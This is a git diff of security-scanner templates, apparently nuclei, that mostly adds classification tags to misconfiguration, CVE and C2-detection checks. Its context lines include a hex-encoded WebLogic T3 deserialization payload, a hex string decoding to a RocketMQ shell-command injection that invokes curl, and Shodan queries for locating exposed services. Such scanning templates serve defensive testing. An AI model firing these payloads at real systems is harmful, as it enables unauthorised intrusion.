springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-mappings.yaml b/http/misconfiguration/springboot/springboot-mappings.yaml index 40508d9990..17f602c958 100644 --- a/http/misconfiguration/springboot/springboot-mappings.yaml +++ b/http/misconfiguration/springboot/springboot-mappings.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Additional routes may be displayed - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-metrics.yaml b/http/misconfiguration/springboot/springboot-metrics.yaml index f46ea7f668..4920f564f2 100644 --- a/http/misconfiguration/springboot/springboot-metrics.yaml +++ b/http/misconfiguration/springboot/springboot-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Additional routes may be displayed - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-threaddump.yaml b/http/misconfiguration/springboot/springboot-threaddump.yaml index edf5e05d68..9aa50b237d 100644 --- a/http/misconfiguration/springboot/springboot-threaddump.yaml +++ b/http/misconfiguration/springboot/springboot-threaddump.yaml @@ -7,7 +7,7 @@ info: description: The threaddump endpoint provides a thread dump from the application's JVM. reference: - https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump - tags: springboot + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index a781359707..56d225cb00 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: html:"Struts Problem Report" - tags: apache,struts,ognl,panel + tags: apache,struts,ognl,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml index 2f1c005aef..ace1faa0ee 100644 --- a/http/misconfiguration/symfony-debug.yaml +++ b/http/misconfiguration/symfony-debug.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"symfony Profiler" - tags: symfony,debug + tags: symfony,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml index d1ea5c3e10..e68661ad72 100644 --- a/http/misconfiguration/symfony-fragment.yaml +++ b/http/misconfiguration/symfony-fragment.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.html:"symfony Profiler" verified: true - tags: config,exposure,symfony + tags: config,exposure,symfony,misconfig http: - method: GET diff --git a/http/misconfiguration/tcpconfig.yaml b/http/misconfiguration/tcpconfig.yaml index c41cc15943..5af9d3a662 100644 --- a/http/misconfiguration/tcpconfig.yaml +++ b/http/misconfiguration/tcpconfig.yaml @@ -12,7 +12,7 @@ info: reference: - https://www.rockwellautomation.com/ - https://www.exploit-db.com/ghdb/6782 - tags: config,edb,logs + tags: config,edb,logs,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-alert-manager.yaml b/http/misconfiguration/unauthenticated-alert-manager.yaml index 704bad7e23..1b29734b79 100644 --- a/http/misconfiguration/unauthenticated-alert-manager.yaml +++ b/http/misconfiguration/unauthenticated-alert-manager.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Alertmanager" - tags: unauth,alertmanager + tags: unauth,alertmanager,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthenticated-glances.yaml b/http/misconfiguration/unauthenticated-glances.yaml index 3290b2619d..0cf9cc859e 100644 --- a/http/misconfiguration/unauthenticated-glances.yaml +++ b/http/misconfiguration/unauthenticated-glances.yaml @@ -7,7 +7,7 @@ info: description: Glance running web server mode & Unauthenticated leads system monitoring to info disclosure reference: - https://glances.readthedocs.io/en/latest/quickstart.html#how-to-protect-your-server-or-web-server-with-a-login-password - tags: exposure,glances + tags: exposure,glances,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-lansweeper.yaml b/http/misconfiguration/unauthenticated-lansweeper.yaml index 8d0d1c6dbb..89756ffe85 100644 --- a/http/misconfiguration/unauthenticated-lansweeper.yaml +++ b/http/misconfiguration/unauthenticated-lansweeper.yaml @@ -4,7 +4,7 @@ info: name: Unauthenticated Lansweeper Instance author: divya_mudgal severity: high - tags: lansweeper,unauth + tags: lansweeper,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml index 21cb165845..f85ddbfd7b 100644 --- a/http/misconfiguration/unauthenticated-mongo-express.yaml +++ b/http/misconfiguration/unauthenticated-mongo-express.yaml @@ -11,7 +11,7 @@ info: max-request: 3 verified: true shodan-query: title:"Home - Mongo Express" - tags: mongo,unauth,edb + tags: mongo,unauth,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthenticated-nacos-access.yaml b/http/misconfiguration/unauthenticated-nacos-access.yaml index 5cfeb84602..c470f5e23a 100644 --- a/http/misconfiguration/unauthenticated-nacos-access.yaml +++ b/http/misconfiguration/unauthenticated-nacos-access.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/alibaba/nacos/issues/4593 - https://nacos.io/en-us/docs/auth.html - tags: nacos,unauth + tags: nacos,unauth,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/unauthenticated-popup-upload.yaml b/http/misconfiguration/unauthenticated-popup-upload.yaml index 09bbfbcba8..8776e52a41 100644 --- a/http/misconfiguration/unauthenticated-popup-upload.yaml +++ b/http/misconfiguration/unauthenticated-popup-upload.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: edb,fileupload + tags: edb,fileupload,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-prtg.yaml b/http/misconfiguration/unauthenticated-prtg.yaml index 4f5da750f7..f9aed34e22 100644 --- a/http/misconfiguration/unauthenticated-prtg.yaml +++ b/http/misconfiguration/unauthenticated-prtg.yaml @@ -7,7 +7,7 @@ info: description: PRTG Traffic Grapher was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5808 - tags: config,unauth,prtg,edb + tags: config,unauth,prtg,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-tensorboard.yaml b/http/misconfiguration/unauthenticated-tensorboard.yaml index 479c6c0988..2d0eb7851f 100644 --- a/http/misconfiguration/unauthenticated-tensorboard.yaml +++ b/http/misconfiguration/unauthenticated-tensorboard.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk description: Tensorflow Tensorboard was able to be accessed with no authentication requirements in place. severity: high - tags: tensorflow,tensorboard,unauth + tags: tensorflow,tensorboard,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthenticated-zipkin.yaml b/http/misconfiguration/unauthenticated-zipkin.yaml index a4a45f6be1..1a7897fc1f 100644 --- a/http/misconfiguration/unauthenticated-zipkin.yaml +++ b/http/misconfiguration/unauthenticated-zipkin.yaml @@ -7,7 +7,7 @@ info: description: Unauthenticated access to Zipkin was discovered. reference: - https://zipkin.io/ - tags: unauth + tags: unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml index 822509cdea..b49f3d1ebe 100644 --- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml +++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml @@ -10,7 +10,7 @@ info: verified: true shodan-query: http.html:"H3C-SecPath-运维审计系统" fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" - tags: h3c,default-login,unauth + tags: h3c,default-login,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthorized-plastic-scm.yaml b/http/misconfiguration/unauthorized-plastic-scm.yaml index b044822315..1fcfe1e4da 100644 --- a/http/misconfiguration/unauthorized-plastic-scm.yaml +++ b/http/misconfiguration/unauthorized-plastic-scm.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-288 - tags: plastic + tags: plastic,misconfig metadata: max-request: 3 diff --git a/http/misconfiguration/ups-status.yaml b/http/misconfiguration/ups-status.yaml index f00408dfce..a1a81dc6a2 100644 --- a/http/misconfiguration/ups-status.yaml +++ b/http/misconfiguration/ups-status.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: logs,status,edb + tags: logs,status,edb,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/viewpoint-system-status.yaml b/http/misconfiguration/viewpoint-system-status.yaml index 1e94cade71..6227b9ac40 100644 --- a/http/misconfiguration/viewpoint-system-status.yaml +++ b/http/misconfiguration/viewpoint-system-status.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"ViewPoint System Status" - tags: status,exposure,viewpoint + tags: status,exposure,viewpoint,misconfig http: - method: GET diff --git a/http/misconfiguration/wamp-server-configuration.yaml b/http/misconfiguration/wamp-server-configuration.yaml index 5344adda83..151267a9ab 100644 --- a/http/misconfiguration/wamp-server-configuration.yaml +++ b/http/misconfiguration/wamp-server-configuration.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Wamp default page will expose sensitive configuration and vhosts. reference: https://www.exploit-db.com/ghdb/6891. - tags: wamp,exposure + tags: wamp,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/wamp-xdebug-detect.yaml b/http/misconfiguration/wamp-xdebug-detect.yaml index a57048e33e..05df08dd31 100644 --- a/http/misconfiguration/wamp-xdebug-detect.yaml +++ b/http/misconfiguration/wamp-xdebug-detect.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: debug,config,wamp + tags: debug,config,wamp,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/webalizer-statistics.yaml b/http/misconfiguration/webalizer-statistics.yaml index 15b62d0d41..6d94f35ff3 100644 --- a/http/misconfiguration/webalizer-statistics.yaml +++ b/http/misconfiguration/webalizer-statistics.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: html:"Generated by The Webalizer" - tags: webalizer,logs,statistics,tenable + tags: webalizer,logs,statistics,tenable,misconfig http: - method: GET diff --git a/http/misconfiguration/wildcard-postmessage.yaml b/http/misconfiguration/wildcard-postmessage.yaml index 74429ca60d..8d4466a282 100644 --- a/http/misconfiguration/wildcard-postmessage.yaml +++ b/http/misconfiguration/wildcard-postmessage.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,postmessage + tags: xss,postmessage,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/zabbix-dashboards-access.yaml b/http/misconfiguration/zabbix-dashboards-access.yaml index 074602a626..7975baba22 100644 --- a/http/misconfiguration/zabbix-dashboards-access.yaml +++ b/http/misconfiguration/zabbix-dashboards-access.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: edb,packetstorm,zabbix,unauth + tags: edb,packetstorm,zabbix,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml index d232113aee..6e7c96ef8e 100644 --- a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml +++ b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://buaq.net/go-53721.html - tags: seeyon,unauth,zhiyuan + tags: seeyon,unauth,zhiyuan,misconfig metadata: max-request: 1 diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml index cfd32cfda1..d028912e71 100644 --- a/http/technologies/sitecore-cms.yaml +++ b/http/technologies/sitecore-cms.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: title:"sitecore" - tags: cms,sitecore + tags: cms,sitecore,tech http: - method: GET diff --git a/http/technologies/tornado-server-login.yaml b/http/technologies/tornado-server-login.yaml index 032348f3bb..b980e316cb 100644 --- a/http/technologies/tornado-server-login.yaml +++ b/http/technologies/tornado-server-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tornado - Login" - tags: panel,tornado + tags: panel,tornado,tech http: - method: GET diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index eb4f08f797..88f99004c2 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2016,weblogic,t3,rce,oast,deserialization + tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 2421314c7b..8bc5ecf4fb 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -21,7 +21,7 @@ info: max-request: 2 shodan-query: title:"RocketMQ" verified: true - tags: cve,cve2023,rocketmq,rce,oast,intrusive + tags: cve,cve2023,rocketmq,rce,oast,intrusive,network variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' diff --git a/network/expn-mail-detect.yaml b/network/expn-mail-detect.yaml index 2d756a3a20..6b1525f20b 100644 --- a/network/expn-mail-detect.yaml +++ b/network/expn-mail-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. - tags: mail,expn,network + tags: mail,expn,network,detect metadata: max-request: 2 diff --git a/ssl/c2/cobalt-strike-c2.yaml b/ssl/c2/cobalt-strike-c2.yaml index 5e76bfea79..df481f70b8 100644 --- a/ssl/c2/cobalt-strike-c2.yaml +++ b/ssl/c2/cobalt-strike-c2.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: "true" shodan-query: ssl.cert.serial:146473198 - tags: ssl,c2,ir,osint + tags: ssl,c2,ir,osint,panel ssl: - address: "{{Host}}:{{Port}}" diff --git a/ssl/c2/metasploit-c2.yaml b/ssl/c2/metasploit-c2.yaml index c5385d75e7..6f4a0f8e1d 100644 --- a/ssl/c2/metasploit-c2.yaml +++ b/ssl/c2/metasploit-c2.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: "true" shodan-query: ssl:"MetasploitSelfSignedCA" - tags: c2,ir,osint,metasploit + tags: c2,ir,osint,metasploit,panel ssl: - address: "{{Host}}:{{Port}}"